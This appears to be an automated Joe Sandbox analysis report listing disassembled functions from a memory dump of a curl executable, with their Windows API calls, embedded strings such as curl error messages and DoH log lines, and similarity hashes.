Function 000000013F31EAE8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EB01
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EB09

Part of subcall function 000000013F31E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F31E951
Part of subcall function 000000013F31E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F31E967

__swprintf_l.LIBCMT ref: 000000013F31EB3F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EB44
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EB4E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EB56
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EB62

Strings

Unknown error %u (0x%08X), xrefs: 000000013F31EB30

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast_errno$FormatMessage__swprintf_lwcstombs
String ID: Unknown error %u (0x%08X)
API String ID: 349418278-1058733786
Opcode ID: 9468cb9c56da335274d3efc2ae4695afa0fa8663077513e2bb2379488229f49c
Instruction ID: 1a4222ae63ad958aea14747b147e1e939e8adc08a694feed051c67c6a8aee795
Opcode Fuzzy Hash: 9468cb9c56da335274d3efc2ae4695afa0fa8663077513e2bb2379488229f49c
Instruction Fuzzy Hash: AA111B36A05B50C2EB11AF11E80839DB771BB88F91F888438DE4943769DF3CDA82C744

Function 000000013F32FE4C Relevance: 13.7, APIs: 5, Strings: 4, Instructions: 165stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000013F32FF17
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000013F32FF31
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000013F32FF54

Strings

../, xrefs: 000000013F32FF27
/../, xrefs: 000000013F32FF8C
/./, xrefs: 000000013F32FF4A
/.., xrefs: 000000013F32FFBF

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: strncmp
String ID: ../$/..$/../$/./
API String ID: 1114863663-456519384
Opcode ID: 7294579a2f72cd1ef6d50c406a1f2bca51cf8538d8eede2b9b4fdbeb408006cb
Instruction ID: 44e8e716b7522feb571846409194cc9d3a98f2644963858a4d4cb0d25063c4ac
Opcode Fuzzy Hash: 7294579a2f72cd1ef6d50c406a1f2bca51cf8538d8eede2b9b4fdbeb408006cb
Instruction Fuzzy Hash: B561B375E0968491FB629F31E4143EA2BA4F756F98F08403EC99A073E9EA29C747C311

Function 000000013F33C730 Relevance: 13.6, APIs: 9, Instructions: 67sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F33BDF4: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,000000013F31DA11,?,?,?,?,?,?,?,?,?,000000013F31553A), ref: 000000013F33BE0B

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C759
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C764
MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C77A
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C7B6
MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C7C5
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C7D7
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C7E5

Part of subcall function 000000013F33BDF4: GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,000000013F31DA11,?,?,?,?,?,?,?,?,?,000000013F31553A), ref: 000000013F33BE34

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C80A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F326119), ref: 000000013F33C818

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: 9fa129cf8a10a0d73ae2e213401e0a883c2230345965de49da55cd80e3c8a4de
Instruction ID: 1eb9dbd7234447b183a5cf15e95a589e08cf087ba7a1649417f409cb9575ab32
Opcode Fuzzy Hash: 9fa129cf8a10a0d73ae2e213401e0a883c2230345965de49da55cd80e3c8a4de
Instruction Fuzzy Hash: 80212A21B15A8082FA559F26A8183EDA3A0FBD8FC0F088539DE4A47755EF2CD687C700

Function 000000013F31A254 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 427COMMON

Download Yara Rule

Strings

, xrefs: 000000013F31A489
%%%02x, xrefs: 000000013F31A605

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID:
String ID: $%%%02x
API String ID: 0-2848173732
Opcode ID: b3b62ac39e6e61bbcb52d112f825f1df93ae01170a8829b0007525cf0d16b262
Instruction ID: a0faeb8eac257c2962efa688b24cbef8b300b1109b1ba29f2346ae4b3235af31
Opcode Fuzzy Hash: b3b62ac39e6e61bbcb52d112f825f1df93ae01170a8829b0007525cf0d16b262
Instruction Fuzzy Hash: 1F02DD32E0978486FF75AB2595583ED6BF0B746B96F58453DCA8A077D0DA28CB47C300

Function 000000013F312DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F312E78
__swprintf_l.LIBCMT ref: 000000013F312F3C
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F312F9C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F312FB8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F312FDB

Strings

internal error: invalid pattern type (%d), xrefs: 000000013F312FA5
%0*lu, xrefs: 000000013F312F24

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free$__acrt_iob_func__swprintf_lstrtoul
String ID: %0*lu$internal error: invalid pattern type (%d)
API String ID: 147458867-449433499
Opcode ID: 7a5d36e5d39d3ca7f5e34a7ee781cb2d5ad5c681a6cb6dd27d853685f0762971
Instruction ID: 0408d7ee52f2528539525fe3caedce67f53b6f5300aa03bb148f83e7576f36d7
Opcode Fuzzy Hash: 7a5d36e5d39d3ca7f5e34a7ee781cb2d5ad5c681a6cb6dd27d853685f0762971
Instruction Fuzzy Hash: 5B518976F09A9089FB10AFA5D8403ED27B1B709BA8F48463DDE5957788DB38C657C310

Function 000000013F30F2F0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 124COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,00000000,000000013F30F519,?,?,?,000000013F30F1CE,?,?,?,?,?,00000000), ref: 000000013F30F3BD
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00000000,00000000,000000013F30F519,?,?,?,000000013F30F1CE,?,?,?,?,?,00000000), ref: 000000013F30F40E

Part of subcall function 000000013F30A7AC: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000014,00000000,000000013F309BD1), ref: 000000013F30A7D7

Strings

SSL_CERT_DIR, xrefs: 000000013F30F3F7
CURL_CA_BUNDLE, xrefs: 000000013F30F3A6
no URL specified!, xrefs: 000000013F30F4BD
SSL_CERT_FILE, xrefs: 000000013F30F456
out of memory, xrefs: 000000013F30F3DE, 000000013F30F433

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _strdup$fputs
String ID: CURL_CA_BUNDLE$SSL_CERT_DIR$SSL_CERT_FILE$no URL specified!$out of memory
API String ID: 4133441535-921570741
Opcode ID: f992a6a2405fb0675fec838efb5fb30836ef72bad299646b3daab79ae14bddd4
Instruction ID: df638f0e45ef44432de935345384dee726c219dfff18bf4946cf3c9b708ed57c
Opcode Fuzzy Hash: f992a6a2405fb0675fec838efb5fb30836ef72bad299646b3daab79ae14bddd4
Instruction Fuzzy Hash: BC516F31A05B4291FE61DB26E5503ED62A0FB85BD4F48403ADD4E47BA6EF38CA47C340

Function 000000013F33C4FC Relevance: 12.1, APIs: 8, Instructions: 99COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F33C530
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F33C549
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F33C55A
_mbsnbcpy.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 000000013F33C5DB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F33C5F1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F33C5FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F33C630
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F33C645

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free$_mbschr_strdup$_mbsnbcpy
String ID:
API String ID: 698015193-0
Opcode ID: 202aedd203a6989fc41f4ac20ce68bfa5d7db459b5743780eee6bd3b79c45fba
Instruction ID: ee9eac23f4fe7716489998479e9868d0504dbb0f5577d9b166be8481869ad564
Opcode Fuzzy Hash: 202aedd203a6989fc41f4ac20ce68bfa5d7db459b5743780eee6bd3b79c45fba
Instruction Fuzzy Hash: 6A412A31A02B5485EA15DF16A8587A837E4FB89FD0F095A3E9E5E07390EF38D286C344

Function 000000013F352610 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 263networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 000000013F352910

Strings

Could not DoH-resolve: %s, xrefs: 000000013F352676
bad error code, xrefs: 000000013F352772
DoH Host name: %s, xrefs: 000000013F3527DD
DoH: %s type %s for %s, xrefs: 000000013F352795
AAAA, xrefs: 000000013F352787

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: htons
String ID: AAAA$Could not DoH-resolve: %s$DoH Host name: %s$DoH: %s type %s for %s$bad error code
API String ID: 4207154920-4260076447
Opcode ID: 7d633c1694b5483172282229e67d9e24285464f8e182ff21bc050942d7f66f87
Instruction ID: d0f12dcf2494ec0859c5559adfb3c4fa498dc93fc6f4ff6c0c44b9f179201e1b
Opcode Fuzzy Hash: 7d633c1694b5483172282229e67d9e24285464f8e182ff21bc050942d7f66f87
Instruction Fuzzy Hash: C3C17A72A08B80C6EB60DF25E4887ED73A4F784B88F55452AEE9E47795DF38C646C700

Function 000000013F32A2D0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,000000013F32AFB6,?,?,?,?,?,?), ref: 000000013F32A395
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,000000013F32AFB6,?,?,?,?,?,?), ref: 000000013F32A444

Strings

%25, xrefs: 000000013F32A38B
Please URL encode %% as %%25, see RFC 6874., xrefs: 000000013F32A39F
No valid port number in connect to host string (%s), xrefs: 000000013F32A468
Invalid IPv6 address format, xrefs: 000000013F32A405

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: strncmpstrtol
String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
API String ID: 826613874-4202423297
Opcode ID: 1445fae2bb943633c9b3e89104484d1b11c1eecccc372fbc47c8b679525d860c
Instruction ID: 18afebd51f57c0a3edc6c0289e515675fe12f5c2be358fe23a8a2c8a4be901b3
Opcode Fuzzy Hash: 1445fae2bb943633c9b3e89104484d1b11c1eecccc372fbc47c8b679525d860c
Instruction Fuzzy Hash: 2B51BF3AE05684A6FF518F16D8943E82BD1B756BD0F84403ADA9A473D5EA3CC79BC700

Function 000000013F302DF4 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 152stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F302E8F
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F302EAE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F302ED0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F302F7E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F302FA3

Strings

|<>"?*, xrefs: 000000013F302F0D
\\?\, xrefs: 000000013F302EC6

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: free$mallocstrncmpstrncpy
String ID: \\?\$|<>"?*
API String ID: 2141947759-3264285191
Opcode ID: 0dfce110ae0fe89019561334145224715787a27e48da09fb880850aed99ea0e6
Instruction ID: 918e16e9d03bf5ac9d7ef04588fe920f31f978a5fcc09573bd7855dfc8105705
Opcode Fuzzy Hash: 0dfce110ae0fe89019561334145224715787a27e48da09fb880850aed99ea0e6
Instruction Fuzzy Hash: 7F51BE71E0D78285FB668E25A9043A9AA90B745FD4F48813EDE5707BD5DB7CCA83C300

Function 000000013F3038F4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303922
fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303934
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303AA8

Strings

%s, xrefs: 000000013F303972, 000000013F303A85
%s, xrefs: 000000013F3039A1, 000000013F3039E4, 000000013F303A24, 000000013F303A57
Failed to open %s to write libcurl code!, xrefs: 000000013F303948

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __acrt_iob_funcfclosefopen
String ID: %s$%s$Failed to open %s to write libcurl code!
API String ID: 4110152555-3591596397
Opcode ID: 0652a37ee7b5bcfae27d71eb5067b0ec01d946506927eda22150fd89cb44c300
Instruction ID: 50f155d3179c72d725932aa9a7387be39bb27bbc7affffde4d43e4600b55be5e
Opcode Fuzzy Hash: 0652a37ee7b5bcfae27d71eb5067b0ec01d946506927eda22150fd89cb44c300
Instruction Fuzzy Hash: 6C513635A05B8290FA56AB16E6803E86361BB45FD0F08903FCE5E1B799DB28D767C341

Function 000000013F3129FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F312A48
calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F312A6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F312A7E
__swprintf_l.LIBCMT ref: 000000013F312B0C

Strings

curl: (%d) %s, xrefs: 000000013F312B19
%s in URL position %zu:%s%*s^, xrefs: 000000013F312AED

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_lcallocfreemalloc
String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
API String ID: 1630718902-2317922172
Opcode ID: d93977fb3abb3e95e852c30432a02b8bfde4792691e35e55328ad6f69930b746
Instruction ID: 6380be66dad4c3ff524b41778239b0a26827489fde5ef9473af1b5ef43fa81fe
Opcode Fuzzy Hash: d93977fb3abb3e95e852c30432a02b8bfde4792691e35e55328ad6f69930b746
Instruction Fuzzy Hash: A1317E32A0578486FB21EF15E8547EA77A0B785BA4F544239EE590B7C5EF3CC646C700

Function 000000013F311728 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F3117A0
__swprintf_l.LIBCMT ref: 000000013F311829

Strings

curl_easy_setopt(hnd, %s, , xrefs: 000000013F311794
%s%luUL);, xrefs: 000000013F31184A
%*s, xrefs: 000000013F311818
%s(long)%s%s, xrefs: 000000013F3117CE

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %*s$%s%luUL);$%s(long)%s%s$curl_easy_setopt(hnd, %s,
API String ID: 1488884202-843713100
Opcode ID: 035ff6a2d2c7669cc04a8a975685340e3e537cccc4e63445aaa86cc8daf22141
Instruction ID: 7a3a8983e43c3600e87073d8c41a83bc71bbb5ce5ac158b3a9e2329b4458851a
Opcode Fuzzy Hash: 035ff6a2d2c7669cc04a8a975685340e3e537cccc4e63445aaa86cc8daf22141
Instruction Fuzzy Hash: A431C232A00A4595FB60FB15E8407EA73B5F7847A0F45423ADD5D93399EF38CA0AC740

Function 000000013F3372CC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

_scwprintf.LIBCMT ref: 000000013F33733F
_scwprintf.LIBCMT ref: 000000013F3373BA

Strings

Proxy-, xrefs: 000000013F3373A2
%s:%s, xrefs: 000000013F337334
Basic, xrefs: 000000013F3372D5
%sAuthorization: Basic %s, xrefs: 000000013F3373AC

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _scwprintf
String ID: %s:%s$%sAuthorization: Basic %s$Basic$Proxy-
API String ID: 1992661772-2466770355
Opcode ID: 444764fe44966ccb04671568f70d680a79f000c40923b4e270f62c6d23e680ac
Instruction ID: 124034b501d9d0a3cfffe50a348cb568db616e7cbbb6c827225fb8036e323348
Opcode Fuzzy Hash: 444764fe44966ccb04671568f70d680a79f000c40923b4e270f62c6d23e680ac
Instruction Fuzzy Hash: 06314F36A05A4492FA01DB16E4943DA67E0F784BE4F54063AEE5D4B7A0DF3CC64BCB80

Function 000000013F30A2D4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F30A2F0
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30A30A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F30A3C7

Strings

error retrieving curl library information, xrefs: 000000013F30A3AB
error initializing curl library, xrefs: 000000013F30A3B4
error initializing curl, xrefs: 000000013F30A3CF

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __acrt_iob_funcfreemalloc
String ID: error initializing curl$error initializing curl library$error retrieving curl library information
API String ID: 2771806388-2118345949
Opcode ID: dd575ed8b6c6299a1a2e1f6c36b0cd8dc25f3b8e35c63980b42d970212e875bd
Instruction ID: 535201a8db7c62120f1d60280b39be573426c4cc94992961fae3502f27f55dc0
Opcode Fuzzy Hash: dd575ed8b6c6299a1a2e1f6c36b0cd8dc25f3b8e35c63980b42d970212e875bd
